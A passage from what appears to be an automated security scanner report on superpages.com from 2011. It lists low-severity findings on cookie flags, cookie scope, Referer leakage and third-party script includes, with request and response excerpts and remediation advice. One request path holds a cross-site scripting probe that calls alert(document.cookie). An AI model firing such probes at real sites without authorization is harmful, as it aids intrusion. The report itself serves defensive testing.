Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:00:26 GMT
Server: Unspecified
Vary: Host
Last-Modified: Tue, 01 Feb 2011 17:29:27 GMT
ETag: "44bf3-d59-dfcd6bc0"
Accept-Ranges: bytes
ntCoent-Length: 3417
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:15:26 GMT;path=/
Cache-Control: private
Content-Length: 3417

/* CURRENT DEAL */
var pagesource = jQuery("body").attr("id");
var url=window.location.toString();
/*strip the 'http://'*/
/*use 'split' to break the url up by '/' into an array */
if((url=="http://ww
...[SNIP]...

3.19. http://www.superpages.com/vorpal/jabberwocky.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /vorpal/jabberwocky.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vorpal/jabberwocky.cgi HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:06:36 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...

3.20. http://www.superpages.com/yellowpages/C-Banks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yellowpages/C-Banks HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:05:59 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:05:59GMT
Content-Length: 43816
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:20:59 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks in Yellow Pages by SuperPages">
<meta name="desc
...[SNIP]...

4. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/
Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:00:23 GMT
Content-Length: 65780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:00:23 GMT; Path=/
Set-Cookie: JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:00:23 GMT
Content-Length: 65780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
<div class="browsers">
<a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" class="ie-btn" title="Internet Explorer 7+"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.mozilla.com/en-US/firefox/ie.html" class="ff-btn" title="Firefox 3+"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.google.com/chrome" class="ch-btn" title="Chrome"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.apple.com/safari/download/" class="sf-btn" title="Safari"><span class="displace">
...[SNIP]...
<span id="coreBizWebsite">
<a target="_blank" href="http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br"
onClick="clickTrackBPElems('bp','Business URL');
findprofileexistandupdatehref('http://clicks.superpages.com/ct/clickThrough?SRC=comlocal1a&amp;target=SP&amp;PN=1&amp;FP=profile&amp;PGID=dalms102.8089.1296748577335.307646855&amp;TS=nbt&amp;ACTION=log,red&amp;LID=2118363360&amp;TR=1&amp;bidType=CLIK&amp;PGSN=E0&amp;FL=profile&amp;TL=off&amp;LOC=http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br','http://yellowpages.superpages.com',this,'CLIK','','dalms102.8089.1296748577335.307646855',''); ">

www.ally.com...</a>
...[SNIP]...
<div id="bizWebsiteImage" style="vertical-align: middle;text-align:center;margin-bottom:5px;"><a onClick="this.href='http://clicks.superpages.com/ct/clickThrough?SRC=comlocal1a&amp;target=SP&amp;PN=1&amp;FP=profile&amp;PGID=dalms102.8089.1296748577335.307646855&amp;TS=nbt&amp;ACTION=log,red&amp;LID=2118363360&amp;TR=1&amp;bidType=CLIK&amp;PGSN=E0&amp;FL=profile&amp;TL=off&amp;LOC=http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br';clickTrackBPElems('bp','Visit Website:View Website icon');" target="_blank" href="http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br"><img src="http://img.superpages.com/images-yp/bpThumbnails/360/363/2118363360/2118363360_adv.jpg" alt="Ally+Bank Website" width="327" height="234" title="Ally+Bank Website"/>
...[SNIP]...
<span style="text-align:center;margin-left:130px;margin-bottom:0px;margin-top:0px;margin-left:0px;padding:0 0 0 0;"><a class="bizWebsiteLink" style="float:none;" target="_blank" href="http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br" title="Ally+Bank Website" onClick="this.href='http://clicks.superpages.com/ct/clickThrough?SRC=comlocal1a&amp;target=SP&amp;PN=1&amp;FP=profile&amp;PGID=dalms102.8089.1296748577335.307646855&amp;TS=nbt&amp;ACTION=log,red&amp;LID=2118363360&amp;TR=1&amp;bidType=CLIK&amp;PGSN=E0&amp;FL=profile&amp;TL=off&amp;LOC=http://ad.doubleclick.net/clk%3B214883954%3B36761209%3Br';clickTrackCore('coreWeb','yp_profile','','Ally+Bank');">View Website</a>
...[SNIP]...
<div class="f10" style="text-align:center; margin-bottom:10px; margin-left:50px">Data provided by one or more of the following: SuperMedia, <a href="http://www.acxiom.com" rel="nofollow" target="_blank"><span>Acxiom</span></a>, <a href="http://www.license.infousa.com" rel="nofollow" target="_blank"><span >
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/00asup_ContinuityBusinessProfile_6" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

5.2. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1#Products & Services HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 17:05:37 GMT
Server: Apache
Vary: Host
X-Powered-By: PHP/5.2.12
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SuperPages.com: Not Found - Please Try Again</title>
<meta http-equiv="Cont
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=1016760;type=relau471;cat=super552;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<div class="browsers">
               <a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" class="ie-btn" title="Internet Explorer 7+"><span class="displace">
...[SNIP]...
</a>
               <a href="http://www.mozilla.com/en-US/firefox/ie.html" class="ff-btn" title="Firefox 3+"><span class="displace">
...[SNIP]...
</a>
               <a href="http://www.google.com/chrome" class="ch-btn" title="Chrome"><span class="displace">
...[SNIP]...
</a>
               <a href="http://www.apple.com/safari/download/" class="sf-btn" title="Safari"><span class="displace">
...[SNIP]...
<li class="ot_gt_advertise"><a href="http://www.supermedia.com">Advertise</a>
...[SNIP]...
<li class="facebook ot_footer_facebook"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com/superpagescom&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:35px;" allowTransparency="true"></iframe></li>
           <li class="twitter ot_footer_twitter"><a href="http://www.twitter.com/superpages" rel="nofollow">Follow us on Twitter</a>
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
<li class="ot_footer_add_business"><a title="Free business listing" href="http://www.supermedia.com/spportal/businessprofilebegin.do?&amp;tsrc=SP&amp;campaignId=SP_FT_AddEditaBusiness">Add or Edit a Business</a>
...[SNIP]...
<li class="ot_footer_advertise"><a title="Online advertising" href="http://www.supermedia.com/spportal/index.jsp?&amp;tsrc=SP&amp;campaignId=SP_FT_AdvertiseWithUs">Advertise with Us</a>
...[SNIP]...
<li class="ot_footer_careers"><a title="Careers" href="http://jobs.supermedia.com/">Careers</a></li>
<li class="ot_footer_contact"><a title="Contact Us" href="http://www.supermedia.com/support/contact-us">Contact Us</a>
...[SNIP]...
<li class="ot_footer_asklearnhire"><a title="Connect with and hire local businesses" target="_blank" href="http://www.asklearnhire.com">Ask Learn Hire</a>
...[SNIP]...
<div class="logo-wrapper">
<a alt="SuperMedia" class="supermedia-logo" href="http://www.supermedia.com">Supermedia</a>
...[SNIP]...
<p class="copyright">&copy; 2009 - 2011 SuperMedia LLC. All rights reserved. * Restrictions apply. For full details, see the <a target="_blank" title="Terms &amp; Conditions (PDF)" href="http://my.supermedia.com/CammsServlet?assetid=10236">Terms and Conditions</a>
...[SNIP]...

5.3. http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OpenPhones=; SPC=1296748823650-www.superpages.com-30323935-794472; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:11:19 GMT
Content-Length: 57654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
<li><a title="Advertise with Superpages.com" target="_blank" href="http://www.supermedia.com/online-advertising?tsrc=SP&campaingnId=SP_listing_header" onClick="clickTrackTabs('GT','Advertising', 'yp_error');">Advertise</a>
...[SNIP]...
<div class="browsers">
<a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" class="ie-btn" title="Internet Explorer 7+"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.mozilla.com/en-US/firefox/ie.html" class="ff-btn" title="Firefox 3+"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.google.com/chrome" class="ch-btn" title="Chrome"><span class="displace">
...[SNIP]...
</a>
<a href="http://www.apple.com/safari/download/" class="sf-btn" title="Safari"><span class="displace">
...[SNIP]...
<noscript>
<iframe src="//fls.doubleclick.net/activityi;src=1016760;type=relau471;cat=super552;ord=1?" width="1" height="1" frameborder="0" style="position:absolute"></iframe>
...[SNIP]...
<td class="bodytexttlt">
Use a <a target="_new" href="http://www.usps.com/zip4">ZIP Code</a>
...[SNIP]...
<li class="facebook"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com/superpagescom&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:35px;" allowTransparency="true"></iframe></li>
<li class="twitter"><a onClick="clickTrackFooter('follow us on twitter');" href="http://www.twitter.com/superpages" rel="nofollow" title="Follow us on Twitter" target="_blank">Follow us on Twitter</a>
...[SNIP]...
<li class="share"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
<li><a title="Free business listing" onClick="clickTrackFooter('add or edit a business');" href="http://www.supermedia.com/business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusiness">Add or Edit a Business</a>
...[SNIP]...
<li><a title="Online advertising" onClick="clickTrackFooter('Advertise with Us');" href="http://www.supermedia.com/online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs">Advertise with Us</a>
...[SNIP]...
<li><a title="Careers" onClick="clickTrackFooter('careers');" href="http://jobs.supermedia.com/">Careers</a></li>
<li><a title="Contact Us" onClick="clickTrackFooter('contact us');" href="http://www.supermedia.com/support/contact-us">Contact Us</a>
...[SNIP]...
<li><a title="Connect with and hire local businesses" target="_blank" onClick="clickTrackFooter('Ask Learn Hire');" href="http://www.asklearnhire.com">Ask Learn Hire</a>
...[SNIP]...
<div class="logo-wrapper">
<a onClick="clickTrackFooter('SuperMedia Logo');" alt="SuperMedia" class="supermedia-logo" href="http://www.supermedia.com">Supermedia</a>
...[SNIP]...
<p class="copyright">&copy; 2009 - 2011 SuperMedia LLC. All rights reserved. * Restrictions apply. For full details, see the <a target="_blank" title="Terms &amp; Conditions (PDF)" onClick="clickTrackFooter('terms and conditions');" href="http://my.supermedia.com/CammsServlet?assetid=10236">Terms and Conditions</a>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 12 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:27 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:27 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.2. http://www.superpages.com/about/copyright.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/copyright.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/copyright.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:04 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:04 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.3. http://www.superpages.com/about/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /about/privacy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/privacy.html HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:05 GMT
Server: Unspecified
Vary: Host
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:05 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="share-container"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...

6.4. http://www.superpages.com/bp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bp/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
